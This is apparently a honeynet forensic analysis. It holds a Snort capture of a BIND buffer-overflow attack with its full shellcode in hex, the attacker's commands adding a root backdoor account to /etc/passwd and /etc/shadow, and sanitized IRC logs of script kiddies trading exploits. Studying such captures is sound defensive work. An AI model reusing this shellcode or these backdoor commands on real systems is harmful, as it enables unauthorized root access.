      08 4D 59 44 4F 4D 41 49 4E 03 43 4F 4D 00 00 01  .MYDOMAIN.COM... 
      00 01 C0 0C 00 01 00 01 00 02 A3 00 00 04 D8 22  ..............." 
      59 03 08 4D 59 44 4F 4D 41 49 4E 03 43 4F 4D 00  Y..MYDOMAIN.COM. 
      00 02 00 01 00 02 A3 00 00 06 03 4E 53 31 C0 32  ...........NS1.2 
      C0 32 00 02 00 01 00 02 A3 00 00 06 03 4E 53 32  .2...........NS2 
      C0 32 C0 32 00 02 00 01 00 02 A3 00 00 02 C0 0C  .2.2............ 
      C0 32 00 02 00 01 00 02 A3 00 00 06 03 4E 53 34  .2...........NS4 
      C0 32 C0 4A 00 01 00 01 00 02 A3 00 00 04 D8 22  .2.J..........." 
      59 01 C0 5C 00 01 00 01 00 02 A3 00 00 04 D8 22  Y..\..........." 
      59 02 C0 0C 00 01 00 01 00 02 A3 00 00 04 D8 22  Y.............." 
      59 03 C0 7C 00 01 00 01 00 02 A3 00 00 04 D8 22  Y..|..........." 
      59 04                                            Y. 
      
                  --- COMMENT:  Buffer Overflow!  --- 
      
      Our nameserver identifies the nameserver for rsavings.net, 63.226.81.13. Our simple UDP DNS request for r.rsavings.net should have resulted in a simple UDP reply containing an answer.  However,
      we get a TCP connection instead, which isused the buffer overflow attack.  The following packets are the actual buffer overflow attack. Notice the '/bin/sh' script ran at the end of the buffer
      overflow.  That is the whole purpose of the exploit.  NOTE:  Based on passive fingerprinting, another forensic tool, this system also appears to be Linux box. 
      
      04/26-06:43:05.096725 63.226.81.13:1351 -> 172.16.1.107:53 
      TCP TTL:49 TOS:0x0 ID:26472  DF 
      **S***** Seq: 0x45B8E7   Ack: 0x0   Win: 0x7D78 
      TCP Options => MSS: 1460 SackOK TS: 4037587 0 NOP WS: 0 
      
      04/26-06:43:05.097443 172.16.1.107:53 -> 63.226.81.13:1351 
      TCP TTL:64 TOS:0x0 ID:18872  DF 
      **S***A* Seq: 0x3FA07873   Ack: 0x45B8E8   Win: 0x7D78 
      TCP Options => MSS: 1460 SackOK TS: 144023498 4037587 NOP WS: 0 
      
      04/26-06:43:05.204503 63.226.81.13:1351 -> 172.16.1.107:53 
      TCP TTL:50 TOS:0x0 ID:26473  DF 
      ******A* Seq: 0x45B8E8   Ack: 0x3FA07874   Win: 0x7D78 
      TCP Options => NOP NOP TS: 4037599 144023498 
      
      04/26-06:43:05.205940 63.226.81.13:1351 -> 172.16.1.107:53 
      TCP TTL:50 TOS:0x0 ID:26474  DF 
      *****PA* Seq: 0x45B8E8   Ack: 0x3FA07874   Win: 0x7D78 
      TCP Options => NOP NOP TS: 4037599 144023498 
      19 C8                                            .. 
      
      04/26-06:43:05.206168 172.16.1.107:53 -> 63.226.81.13:1351 
      TCP TTL:64 TOS:0x0 ID:18873  DF 
      ******A* Seq: 0x3FA07874   Ack: 0x45B8EA   Win: 0x7D78 
      TCP Options => NOP NOP TS: 144023509 4037599 
        
      
      04/26-06:43:05.244101 63.226.81.13:1351 -> 172.16.1.107:53 
      TCP TTL:50 TOS:0x0 ID:26475  DF 
      *****PA* Seq: 0x45B8EA   Ack: 0x3FA07874   Win: 0x7D78 
      TCP Options => NOP NOP TS: 4037599 144023498 
      0C BC 84 00 00 01 00 01 00 00 00 01 01 72 08 72  .............r.r 
      73 61 76 69 6E 67 73 03 6E 65 74 00 00 01 00 01  savings.net..... 
      01 72 08 72 73 61 76 69 6E 67 73 03 6E 65 74 00  .r.rsavings.net. 
      00 01 00 01 00 00 01 2C 00 04 01 02 03 04 01 72  .......,.......r 
      08 72 73 61 76 69 6E 67 73 03 6E 65 74 00 00 1E  .rsavings.net... 
      00 01 00 00 01 2C 19 6B 00 06 61 64 6D 61 64 6D  .....,.k..admadm 
      00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................ 
      90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................ 
      
          ... repeated noops (0x90) removed for brevity sake --- 
      
      90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................ 
      90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................ 
      90 90 90 90 90 90 90 90 90 90 90 90 90 90 E9 AC  ................ 
      01 00 00 5E 89 76 0C 8D 46 08 89 46 10 8D 46 2E  ...^.v..F..F..F. 
      89 46 14 56 EB 54 5E 89 F3 B9 00 00 00 00 BA 00  .F.V.T^......... 
      00 00 00 B8 05 00 00 00 CD 80 50 8D 5E 02 B9 FF  ..........P.^... 
      01 00 00 B8 27 00 00 00 CD 80 8D 5E 02 B8 3D 00  ....'......^..=. 
      00 00 CD 80 5B 53 B8 85 00 00 00 CD 80 5B B8 06  ....[S.......[.. 
      00 00 00 CD 80 8D 5E 0B B8 0C 00 00 00 CD 80 89  ......^......... 
      F3 B8 3D 00 00 00 CD 80 EB 2C E8 A7 FF FF FF 2E  ..=......,...... 
      00 41 44 4D 52 4F 43 4B 53 00 2E 2E 2F 2E 2E 2F  .ADMROCKS.../../ 
      2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E  ../../../../../. 
      2E 2F 2E 2E 2F 00 5E B8 02 00 00 00 CD 80 89 C0  ./../.^......... 
      85 C0 0F 85 8E 00 00 00 89 F3 8D 4E 0C 8D 56 18  ...........N..V. 
      B8 0B 00 00 00 CD 80 B8 01 00 00 00 CD 80 E8 75  ...............u 
      00 00 00 10 00 00 00 00 00 00 00 74 68 69 73 69  ...........thisi 
      73 73 6F 6D 65 74 65 6D 70 73 70 61 63 65 66 6F  ssometempspacefo 
      72 74 68 65 73 6F 63 6B 69 6E 61 64 64 72 69 6E  rthesockinaddrin 
      79 65 61 68 79 65 61 68 69 6B 6E 6F 77 74 68 69  yeahyeahiknowthi 
      73 69 73 6C 61 6D 65 62 75 74 61 6E 79 77 61 79  sislamebutanyway 
      77 68 6F 63 61 72 65 73 68 6F 72 69 7A 6F 6E 67  whocareshorizong 
      6F 74 69 74 77 6F 72 6B 69 6E 67 73 6F 61 6C 6C  otitworkingsoall 
      69 73 63 6F 6F 6C EB 86 5E 56 8D 46 08 50 8B 46  iscool..^V.F.P.F 
      04 50 FF 46 04 89 E1 BB 07 00 00 00 B8 66 00 00  .P.F.........f.. 
      00 CD 80 83 C4 0C 89 C0 85 C0 75 DA 66 83 7E 08  ..........u.f.~. 
      02 75 D3 8B 56 04 4A 52 89 D3 B9 00 00 00 00 B8  .u..V.JR........ 
      3F 00 00 00 CD 80 5A 52 89 D3 B9 01 00 00 00 B8  ?.....ZR........ 
      3F 00 00 00 CD 80 5A 52 89 D3 B9 02 00 00 00 B8  ?.....ZR........ 
      3F 00 00 00 CD 80 EB 12 5E 46 46 46 46 46 C7 46  ?.......^FFFFF.F 
      10 00 00 00 00 E9 FE FE FF FF E8 E9 FF FF FF E8  ................ 
      4F FE FF FF 2F 62 69 6E 2F 73 68 00 2D 63 00 FF  O.../bin/sh.-c.. 
      FF FF FF FF FF FF FF FF FF FF FF FF 00 00 00 00  ................ 
      70 6C 61 67 75 65 7A 5B 41 44 4D 5D 31 30 2F 39  plaguez[ADM]10/9 
      39 2D 65 78 69 74 00 90 90 90 90 90 90 90 90 90  9-exit.......... 
      90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................ 
      90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................ 
      90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................ 
      90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................ 
      90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................ 
      90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................ 
      90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................ 
      90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................ 
      90 90 90 90 90 90 90 90 C3 D6 FF BF C3 D6 FF BF  ................ 
      C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF  ................ 
      C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF  ................ 
      C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF  ................ 
      C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF  ................ 
      C3 D6 FF BF C3 D6 FF BF 00 00 00 00 00 00 00 00  ................ 
      00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................ 
      00 00 00 00 00 00 00 00                          ........ 
      . 
      
                  --- COMMENT:  The script --- 
      
      Now that the buffer overflow has been launched, we have a root shell.  Something must be done with that rootshell. Our black-hat runs the following commands with that shell.  He first confirms
      the system architecture (uname -a) and the shell uid (id).  He then inserts two accounts onto the system, twin and hantu. 
      
      04/26-06:43:05.483639 172.16.1.107:53 -> 63.226.81.13:1351 
      TCP TTL:64 TOS:0x0 ID:18876  DF 
      ******A* Seq: 0x3FA07874   Ack: 0x45D2B2   Win: 0x7C70 
      TCP Options => NOP NOP TS: 144023537 4037617 
      
      04/26-06:43:06.219868 63.226.81.13:1351 -> 172.16.1.107:53 
      TCP TTL:50 TOS:0x0 ID:26480  DF 
      *****PA* Seq: 0x45D2B2   Ack: 0x3FA07874   Win: 0x7D78 
      TCP Options => NOP NOP TS: 4037700 144023537 
      63 64 20 2F 3B 20 75 6E 61 6D 65 20 2D 61 3B 20  cd /; uname -a; 
      70 77 64 3B 20 69 64 3B 0A                       pwd; id;. 
      
      04/26-06:43:06.233691 172.16.1.107:53 -> 63.226.81.13:1351 
      TCP TTL:64 TOS:0x0 ID:18877  DF 
      ******A* Seq: 0x3FA07874   Ack: 0x45D2CB   Win: 0x7C70 
      TCP Options => NOP NOP TS: 144023612 4037700 
      
      04/26-06:43:06.236460 172.16.1.107:53 -> 63.226.81.13:1351 
      TCP TTL:64 TOS:0x0 ID:18878  DF 
      *****PA* Seq: 0x3FA07874   Ack: 0x45D2CB   Win: 0x7C70 
      TCP Options => NOP NOP TS: 144023612 4037700 
      4C 69 6E 75 78 20 61 70 6F 6C 6C 6F 2E 75 69 63  Linux apollo.uic 
      6D 62 61 2E 65 64 75 20 32 2E 32 2E 35 2D 31 35  mba.edu 2.2.5-15 
      20 23 31 20 4D 6F 6E 20 41 70 72 20 31 39 20 32   #1 Mon Apr 19 2 
      32 3A 32 31 3A 30 39 20 45 44 54 20 31 39 39 39  2:21:09 EDT 1999 
      20 69 35 38 36 20 75 6E 6B 6E 6F 77 6E 0A         i586 unknown. 
      
      04/26-06:43:06.346489 63.226.81.13:1351 -> 172.16.1.107:53 
      TCP TTL:50 TOS:0x0 ID:26482  DF 
      ******A* Seq: 0x45D2CB   Ack: 0x3FA078C2   Win: 0x7D78 
      TCP Options => NOP NOP TS: 4037713 144023612 
      
      04/26-06:43:06.346819 172.16.1.107:53 -> 63.226.81.13:1351 
      TCP TTL:64 TOS:0x0 ID:18879  DF 
      *****PA* Seq: 0x3FA078C2   Ack: 0x45D2CB   Win: 0x7C70 
      TCP Options => NOP NOP TS: 144023623 4037713 
      2F 0A 75 69 64 3D 30 28 72 6F 6F 74 29 20 67 69  /.uid=0(root) gi 
      64 3D 30 28 72 6F 6F 74 29 20 67 72 6F 75 70 73  d=0(root) groups 
      3D 30 28 72 6F 6F 74 29 2C 31 28 62 69 6E 29 2C  =0(root),1(bin), 
      32 28 64 61 65 6D 6F 6E 29 2C 33 28 73 79 73 29  2(daemon),3(sys) 
      2C 34 28 61 64 6D 29 2C 36 28 64 69 73 6B 29 2C  ,4(adm),6(disk), 
      31 30 28 77 68 65 65 6C 29 0A                    10(wheel). 
      
      04/26-06:43:06.486257 63.226.81.13:1351 -> 172.16.1.107:53 
      TCP TTL:50 TOS:0x0 ID:26483  DF 
      ******A* Seq: 0x45D2CB   Ack: 0x3FA0791C   Win: 0x7D78 
      TCP Options => NOP NOP TS: 4037727 144023623 
      
      04/26-06:43:09.880779 213.28.22.189:1045 -> 172.16.1.107:53 
      UDP TTL:40 TOS:0x0 ID:18907 
      Len: 40 
      95 6B 01 00 00 01 00 00 00 00 00 00 01 72 08 72  .k...........r.r 
      73 61 76 69 6E 67 73 03 6E 65 74 00 00 01 00 01  savings.net..... 
      
      04/26-06:43:19.875096 213.28.22.189:1045 -> 172.16.1.107:53 
      UDP TTL:40 TOS:0x0 ID:18941 
      Len: 40 
      95 6B 01 00 00 01 00 00 00 00 00 00 01 72 08 72  .k...........r.r 
      73 61 76 69 6E 67 73 03 6E 65 74 00 00 01 00 01  savings.net..... 
      
      04/26-06:43:39.856657 213.28.22.189:1045 -> 172.16.1.107:53 
      UDP TTL:40 TOS:0x0 ID:19019 
      Len: 40 
      95 6B 01 00 00 01 00 00 00 00 00 00 01 72 08 72  .k...........r.r 
      73 61 76 69 6E 67 73 03 6E 65 74 00 00 01 00 01  savings.net..... 
      
      04/26-06:44:00.432457 63.226.81.13:1351 -> 172.16.1.107:53 
      TCP TTL:50 TOS:0x0 ID:26498  DF 
      *****PA* Seq: 0x45D2CB   Ack: 0x3FA0791C   Win: 0x7D78 
      TCP Options => NOP NOP TS: 4043120 144023623 
      65 63 68 6F 20 22 74 77 69 6E 3A 3A 35 30 36 3A  echo "twin::506: 
      35 30 36 3A 3A 2F 68 6F 6D 65 2F 74 77 69 6E 3A  506::/home/twin: 
      2F 62 69 6E 2F 62 61 73 68 22 20 3E 3E 20 2F 65  /bin/bash" >> /e 
      74 63 2F 70 61 73 73 77 64 0A                    tc/passwd. 
      
      04/26-06:44:00.448249 172.16.1.107:53 -> 63.226.81.13:1351 
      TCP TTL:64 TOS:0x0 ID:18892  DF 
      ******A* Seq: 0x3FA0791C   Ack: 0x45D305   Win: 0x7C70 
      TCP Options => NOP NOP TS: 144029033 4043120 
      
      04/26-06:44:00.562329 63.226.81.13:1351 -> 172.16.1.107:53 
      TCP TTL:50 TOS:0x0 ID:26499  DF 
      *****PA* Seq: 0x45D305   Ack: 0x3FA0791C   Win: 0x7D78 
      TCP Options => NOP NOP TS: 4043134 144029033 
      65 63 68 6F 20 22 74 77 69 6E 3A 77 33 6E 54 32  echo "twin:w3nT2 
      48 30 62 36 41 6A 4D 32 3A 3A 3A 3A 3A 3A 3A 22  H0b6AjM2:::::::" 
      20 3E 3E 20 2F 65 74 63 2F 73 68 61 64 6F 77 0A   >> /etc/shadow. 
      0A                                               . 
      
      04/26-06:44:00.578252 172.16.1.107:53 -> 63.226.81.13:1351 
      TCP TTL:64 TOS:0x0 ID:18893  DF 
      ******A* Seq: 0x3FA0791C   Ack: 0x45D336   Win: 0x7C70 
      TCP Options => NOP NOP TS: 144029046 4043134 
      
      04/26-06:44:03.647436 63.226.81.13:1351 -> 172.16.1.107:53 
      TCP TTL:50 TOS:0x0 ID:26501  DF 
      *****PA* Seq: 0x45D336   Ack: 0x3FA0791C   Win: 0x7D78 
      TCP Options => NOP NOP TS: 4043443 144029046 
      0A                                               . 
      
      04/26-06:44:03.658554 172.16.1.107:53 -> 63.226.81.13:1351 
      TCP TTL:64 TOS:0x0 ID:18894  DF 
      ******A* Seq: 0x3FA0791C   Ack: 0x45D337   Win: 0x7C70 
      TCP Options => NOP NOP TS: 144029354 4043443 
      
      04/26-06:44:04.699420 63.226.81.13:1351 -> 172.16.1.107:53 
      TCP TTL:50 TOS:0x0 ID:26502  DF 
      *****PA* Seq: 0x45D337   Ack: 0x3FA0791C   Win: 0x7D78 
      TCP Options => NOP NOP TS: 4043548 144029354 
      65 63 68 6F 20 22 68 61 6E 74 75 3A 3A 30 3A 30  echo "hantu::0:0 
      3A 3A 2F 3A 2F 62 69 6E 2F 62 61 73 68 22 20 3E  ::/:/bin/bash" > 
      3E 20 2F 65 74 63 2F 70 61 73 73 77 64 0A        > /etc/passwd. 
      
      04/26-06:44:04.718625 172.16.1.107:53 -> 63.226.81.13:1351 
      TCP TTL:64 TOS:0x0 ID:18895  DF 
      ******A* Seq: 0x3FA0791C   Ack: 0x45D365   Win: 0x7C70 
      TCP Options => NOP NOP TS: 144029460 4043548 
      
      04/26-06:44:04.829064 63.226.81.13:1351 -> 172.16.1.107:53 
      TCP TTL:50 TOS:0x0 ID:26504  DF 
      *****PA* Seq: 0x45D365   Ack: 0x3FA0791C   Win: 0x7D78 
      TCP Options => NOP NOP TS: 4043561 144029460 
      65 63 68 6F 20 22 68 61 6E 74 75 3A 77 33 6E 54  echo "hantu:w3nT 
      32 48 30 62 36 41 6A 4D 32 3A 3A 3A 3A 3A 3A 3A  2H0b6AjM2::::::: 
      22 20 3E 3E 20 2F 65 74 63 2F 73 68 61 64 6F 77  " >> /etc/shadow 
      0A 0A 0A 
      
      04/26-06:44:04.848620 172.16.1.107:53 -> 63.226.81.13:1351 
      TCP TTL:64 TOS:0x0 ID:18896  DF 
      ******A* Seq: 0x3FA0791C   Ack: 0x45D398   Win: 0x7C70 
      TCP Options => NOP NOP TS: 144029473 4043561 
      
      04/26-06:46:21.055744 63.226.81.13:1351 -> 172.16.1.107:53 
      TCP TTL:50 TOS:0x0 ID:26540  DF 
      ***F**A* Seq: 0x45D398   Ack: 0x3FA0791C   Win: 0x7D78 
      TCP Options => NOP NOP TS: 4057184 144029473 
      
      04/26-06:46:21.055951 172.16.1.107:53 -> 63.226.81.13:1351 
      TCP TTL:64 TOS:0x0 ID:18974  DF 
      ******A* Seq: 0x3FA0791C   Ack: 0x45D399   Win: 0x7C70 
      TCP Options => NOP NOP TS: 144043092 4057184 
      
      04/26-06:46:21.056696 172.16.1.107:53 -> 63.226.81.13:1351 
      TCP TTL:64 TOS:0x0 ID:18975  DF 
      ***F**A* Seq: 0x3FA0791C   Ack: 0x45D399   Win: 0x7C70 
      TCP Options => NOP NOP TS: 144043092 4057184 
      
      04/26-06:46:21.167231 63.226.81.13:1351 -> 172.16.1.107:53 
      TCP TTL:50 TOS:0x0 ID:26542  DF 
      ******A* Seq: 0x45D399   Ack: 0x3FA0791D   Win: 0x7D78 
      TCP Options => NOP NOP TS: 4057196 144043092 
        
      
      Exiting... 
        
      
      =============================================================================== 
      Snort processed 59 packets. 
      Breakdown by protocol: 
          TCP: 33         (55.932%) 
          UDP: 26         (44.068%) 
         ICMP: 0          (0.000%) 
          ARP: 0          (0.000%) 
         IPv6: 0          (0.000%) 
          IPX: 0          (0.000%) 
        OTHER: 0          (0.000%) 
        
      
      =============================================================================== 
      
      EoF
      
      Additional analysis Know your enemy #3: Forensics
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      #
      # I will be posting other people's observations on
      # this page.  If you have anything you would like to
      # add, email Lance Spitzner <lance@spitzner.net>
      #
      
      Contributed by verin <knight@pctechnician.net>
      
      1. NUS = National University of Singapore. homepage is www.nus.edu.sg
      
      2. 137.132.216.35 = this looks like a home account given to students (
      unknown faculty )
      
      3. 137.132.17.202 = Looks like a labatory computer, library computer,
      Lecturer's computer, Not a server. ( could be a server. but it'd be an
      internal one and heavily firewalled. )
      
      4. [root@apollo /]# nslookup magix : Magix is an ADSL Internet Service
      Provided by Singtel ( Singapore Telecommunications Ltd.)Attacker may
      have an account on it. Homepage is www.magix.com.sg
      
      5. [root@apollo /]# nslookup irc.powersurf.com : Most likely hangs
      around on that server.. probably in channels like #singapore or
      singapore, NUS related.
      
      EoF
      
      @HWA
      
      
      The script kids chat logs sniffed from compromised system : #4
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      (Sanitized)
      
      Day 01 - June 4
      
      :D1ck :hello J4n3 
      :J4n3 :hello D1ck 
      :J4n3 :i called u , u weren't there
      :J4n3 ::)
      :D1ck :oh 
      :D1ck :i just got back from dinner.
      :D1ck ::/
      :D1ck :sup sup?
      :J4n3 :heh
      :J4n3 :nothin much
      :J4n3 :yaar that ifup wasn't connecting
      :J4n3 :i did it throug kppp of kde
      :D1ck :oye
      :D1ck :i am making a elite archieve of sploits just for k1dd13 members
      :D1ck :can u make pass protection on sites?
      :J4n3 :D1ck u talkin to me ?
      :D1ck :yea
      :J4n3 :yeah i can make it password protected
      :J4n3 :cgi script
      :D1ck :ls ftp
      :D1ck :bd  bnc  botpack  clone  dos  exploit  kit  local  login  scan  sniff  spoof
      :D1ck :cool
      :D1ck :ok
      :D1ck :i have an account on www.example.com
      :J4n3 :hehe kewl
      :D1ck :when i boot i`ll give j00h the pass
      :D1ck :make sure it's leet i dont want any other person other then u me m4ry mi||er and glitchX to have access
      :D1ck ::P
      :D1ck :hehe
      :D1ck :all leet stuff
      :J4n3 :y0 hooo
      :J4n3 :ha ha
      :J4n3 :d0n worry boss
      :D1ck :hehehe
      :D1ck ::)
      :J4n3 :tight
      :J4n3 :kewl
      :J4n3 :zabardasth :p
      :D1ck :=P
      :D1ck :u have any stuff u wana get added?
      :J4n3 :not any thin speciall yaar wahi common sploits
      :J4n3 :but yeah
      :J4n3 :i'm gonna grab some from doc
      :J4n3 :then i'll ad them there
      :D1ck :?
      :D1ck :cool
      :D1ck :doc never gives :(
      :D1ck :or does he
      :D1ck :hehe
      :D1ck :ok
      :J4n3 :heeh yeah he does
      :J4n3 :he offered me , but maiany khud hee manga nahi kabi
      :J4n3 :just once i asked him for statd 
      :J4n3 :he gave me a linux version of it
      :D1ck :wow.c
      :D1ck :?
      :D1ck :wow.c is VERY VERY VERY VERY OLD
      :D1ck :wow.c is VERY VERY VERY VERY OLD
      :J4n3 :hhaah yeah
      :J4n3 :he gave me 2
      :J4n3 :wow and another 0-day production 
      :D1ck : Signon by h4r33
      :D1ck :OCENTER.SKYINET.NET at 10:08pm
      :D1ck :<OCENTER.SKYINET.NET at 10:08pm
      :J4n3 :ye INFOCENTER haath nahi aaya abee thak ?
      :D1ck :err
      :D1ck :<J4n3> wow and another 0-day production
      :D1ck :wow is not 0-day
      :D1ck :its old
      :D1ck :whats the other?
      :J4n3 :wait
      :D1ck :hehe
      :D1ck :nope yaar
      :J4n3 :[root@example portedfor]# ./statd-new
      :J4n3 :Legion 2000 Security Research 0-day Productions
      :J4n3 : New Modified statd remote exploit - ironlungs@wireco.net
      :J4n3 :sage: ./statd-new [host_name] [remote_cachename] [command]
      :D1ck :hmmmmm
      :D1ck :cool
      :D1ck :can u send me?
      :D1ck :0x9 098e 9x /
      :J4n3 :why not honey
      :J4n3 :;)
      :D1ck :k thanks
      :D1ck :<h4r33:#Linuxsex> who the fuck removed my xs again ?
      :D1ck :HAHAHAHA
      :J4n3 :hahahahha
      :D1ck :d4v3
      :D1ck : send me the .c
      :J4n3 :don have it
      :J4n3 :i got compiled one
      :D1ck :man it could be a trojan?
      :J4n3 :i got all these compiled
      :D1ck :they can direct shell code to localhost, 12.0.0.1
      :J4n3 :haha naaa
      :D1ck :not may good coders can read it.
      :J4n3 :its not 100 %
      :D1ck :heh well ok
      :J4n3 :meri guarantie
      :D1ck :send me the other 0-day
      :D1ck :kewl
      :D1ck :does it work
      :J4n3 :i got all these already compiled
      :D1ck :?
      :J4n3 :yyeah it does but mostly boxes r patched
      :J4n3 :[root@example portedfor]# ls
      :J4n3 :admmount  imapx   mountd      pcnfsd_remote  rotshb    statd-new
      :J4n3 :boot      listen  nameserver  ported_f.zip   smbmount  wow
      :J4n3 :dipx      lsx     nisd        robo           solbind
      :D1ck :heh ok
      :J4n3 :and yeah wait
      :J4n3 :[root@example 0-day]# ls
      :J4n3 :core  fbo.c  ob_accou.c  prout  rh6mountd.c  rpc-autofsd  sdi
      :D1ck :okies
      :D1ck :hahah kewl
      :D1ck :/dcc send me if u can/want :/
      :J4n3 :kon kon sa baijon ? all ?
      :D1ck :tar -zcvf 0-day.tar.gz 0-day
      :J4n3 :what the tar command lemme tar the 0-day folder
      :D1ck : /dcc send D1ck 0-day.tar.gz
      :D1ck :hehe
      :D1ck :<D1ck> tar -zcvf 0-day.tar.gz 0-day
      :D1ck :rr heh
      :J4n3 :oye
      :D1ck :yo
      :J4n3 :i downloaded a file from packetstorm
      :J4n3 :name was ALL-EXPLOITS-1999
      :D1ck :yep?
      :J4n3 :6 mb file
      :J4n3 :ALL-EXPLOITS-199.tar.gz
      :J4n3 :ALL-EXPLOITS-1999.tar.gz
      :J4n3 :too many sploits in them
      :J4n3 :it made 10 folders
      :J4n3 :evey folder contain different sploits
      :D1ck :ok and?
      :J4n3 :i mean to say u also download it, shayed kaam kee cheez niklay
      :D1ck :oh accha
      :D1ck :give me the url
      :D1ck :yaar most exploits are dummy's or trojans remember
      :D1ck :or they have bugs
      :D1ck :only a few worl
      :D1ck :only a few worl
      :J4n3 :packetstorm.securify.com  look in main page at top 20 recent files
      :D1ck :errr
      :J4n3 :yeah i know
      :D1ck :send me i`ll put important ones in there
      :D1ck :okies 
      :D1ck :suspicious code
      :D1ck :rhmountd.c
      :D1ck :checkign
      :J4n3 :kkz
      :D1ck :did they compile?
      :D1ck :ah
      :D1ck :IRIX
      :J4n3 :that account.c ?
      :D1ck :yep
      :J4n3 :yeah i heard its a great program
      :J4n3 :it remotely add login and pass on IRIX system
      :D1ck :hmmmm
      :D1ck :i think its locally
      :J4n3 :   SGI objectserver "account" exploit                                 */
      :J4n3 :   Remotely adds account to the IRIX system.                          */
      :J4n3 :   Tested on IRIX 5.2, 5.3, 6.0.1, 6.1 and even 6.2,    
      :D1ck :kewl kewl
      :D1ck :Oh this is the 0-day
      :D1ck :Oh this is the 0-day
      :J4n3 :yeah
      :D1ck :leet
      :D1ck :does it compile?
      :J4n3 ::p
      :J4n3 :on irix i think
      :D1ck :haha ok
      :D1ck :# uname -a;
      :D1ck :id
      :D1ck :IRIX delta 5.3 11091811 IP19 mips
      :D1ck :# uid=0(root) gid=0(sys)
      :D1ck :#
      :D1ck :HAHAHAHAH
      :D1ck :don't get exited, i`m joking :/
      :D1ck :hehe
      :J4n3 :hahahah
      :J4n3 :COOOOL
      :J4n3 :it works haaan
      :J4n3 :where did u compile it ? on IRIX system ?
      :D1ck :hehehhe
      :D1ck :i am kidding 
      :D1ck :oe
      :D1ck :oye
      :D1ck ::)
      :J4n3 :lol
      :J4n3 :yeah ?
      :J4n3 :des|re .join #tr1be grepbitch
      :D1ck :oye
      :D1ck :send yure brother
      :J4n3 :yeah
      :D1ck :the url
      :D1ck :to that 6mb exploit file
      :D1ck :heh
      :J4n3 :my brother ?
      :D1ck :me
      :D1ck ::)
      :D1ck :<J4n3> my brother ?
      :D1ck :<D1ck> me
      :J4n3 :hahaha
      :J4n3 :sure sure
      :D1ck ::)
      :D1ck :LOL
      :J4n3 :hehe
      :D1ck :J4n3 
      :D1ck :give me some machine
      :D1ck :i`ll sploit it
      :D1ck :irix
      :D1ck :this way bots remember.
      
      -=-
      
      Day 02 June 5
      
      :D1ck :miller
      :D1ck :;)
      :b0b :commerce?
      :b0b :lame nick ;-)
      :D1ck :?
      :b0b :d1ckey
      :D1ck :heh
      :D1ck :welp
      :D1ck :one bot from one box
      :D1ck :we dont have nicks
      :D1ck :so we name it from the ops
      :D1ck :hehe
      :D1ck :ips
      :D1ck : commerce (~werd@commerce.example.COM) (I
      :b0b :lol
      :b0b :ath0 my phriend 
      :D1ck :so what's up b0b 
      :D1ck ::/
      :D1ck :commerce nick ath0
      :D1ck :i coded ath0.c
      :b0b :kewl
      :D1ck :there was no need
      :D1ck :but
      :D1ck :i was boed
      :D1ck :accept my stuff
      :b0b :cut/paste?
      :D1ck :nope
      :D1ck :coded my self
      :D1ck :m4ry coded a elite port 80 httpd 0-day trojan
      :D1ck :he is mad elite in C
      :b0b :i know.. i was asking you to cut/paste the relevany code :-)
      :D1ck :heh
      :D1ck :bd.tar.gz is a backdoor for bindshell, i made that too
      :D1ck ::)
      :b0b :uff trunciated
      :b0b :kewl
      :D1ck :don't distro vortex3.c, its not mine :/
      :D1ck :hehe
      :D1ck :<b0b> uff trunciated
      :D1ck :i dint understand what that word means :/
      :D1ck :be EASY ON ENGALISH WITH ME #@#$@#$@#%$#@
      :D1ck ::)
      :b0b :what's vor-ticks-3?
      :b0b :hehe
      :b0b :chud gai thee
      :b0b :carriage returns
      :D1ck :A TROJAN
      :D1ck :on receiving a string
      :D1ck :on port 80
      :D1ck :it opens a bind shell
      :D1ck :like on a string'asad'
      :D1ck :it opens port 234323,
      :D1ck :or some thing
      :D1ck :hehehe
      :D1ck :LOL
      :b0b :bhai jaan..
      :b0b :if it is i c.. do some ereet shiats like subnet pining with ath0 etc.
      :D1ck :y0h f0h b4r
      :b0b :would be a whole lot faster than a bash scrwipt
      :b0b :me and angie already did the subnet ping shiats tc.
      :b0b :but C would rawk
      :b0b :0wn even
      :D1ck :yep
      :D1ck :i`ll do it
      :b0b :kewl
      :D1ck :but 
      :D1ck :shell script is a better idea.
      :D1ck :or i1ll have to write codes for gethostname()
      :b0b :and make it fork to background eggdrop ishtyle :-)
      :b0b :and loop
      :D1ck :abd work on errors
      :D1ck :hehe
      :D1ck :yep
      :b0b :so if we wanna fux0r one isp.. all we do is ./fuck
      :b0b :so if we wanna fux0r one isp.. all we do is ./fuck <subnet>
      :D1ck : DCC Auto-closing idle dcc SEND to b0b
      :D1ck :bind,sock.
      :D1ck :ah
      :D1ck :yep
      :b0b :do the gethostbyname() shiats foo
      :b0b :or what good are ur m4d C skillz?
      :b0b :send again
      :b0b :btw, i'm going to be learning C soon too inshallah
      :b0b :the we'll have C fights
      :b0b :yipeeee
      :b0b :i'll insult you in code
      :b0b :kekekeke
      :D1ck :i`ll do it ;)
      :D1ck :i made this ftp site i`ll upload it 
      :D1ck :just for k1dd13, all private stuff
      :D1ck :ls /root/ftp
      :D1ck :bd   botpack  dos      hack-irc-session  local  scan   spoof
      :D1ck :bnc  clone    exploit  kit               login  sniff
      :D1ck :oki
      :D1ck :i`ll do 
      :D1ck :hahahaha
